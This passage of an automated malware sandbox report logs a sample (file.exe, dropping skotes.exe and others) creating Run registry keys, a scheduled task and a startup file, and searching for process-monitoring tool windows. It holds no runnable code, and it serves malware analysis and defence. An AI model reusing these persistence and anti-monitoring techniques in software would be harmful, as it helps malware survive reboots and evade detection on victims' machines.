                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017909001\f8645e1e85.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017914001\db75e03f4b.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeFile created: C:\Users\Public\Netstat\PCICL32.DLLJump to dropped file

                                Boot Survival

                                barindex
                                Creates multiple autostart registry keys
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f8645e1e85.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 67fbb282d1.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fde98a8d0b.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f7b3852b06.exeJump to behavior
                                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClass
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeWindow searched: window name: RegmonClass
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeWindow searched: window name: Regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeWindow searched: window name: Filemonclass
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeWindow searched: window name: Regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to behavior
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f8645e1e85.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f8645e1e85.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fde98a8d0b.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fde98a8d0b.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 67fbb282d1.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 67fbb282d1.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f7b3852b06.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f7b3852b06.exeJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Loading BitLocker PowerShell Module
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AED5820 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,5_2_00007FF67AED5820
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
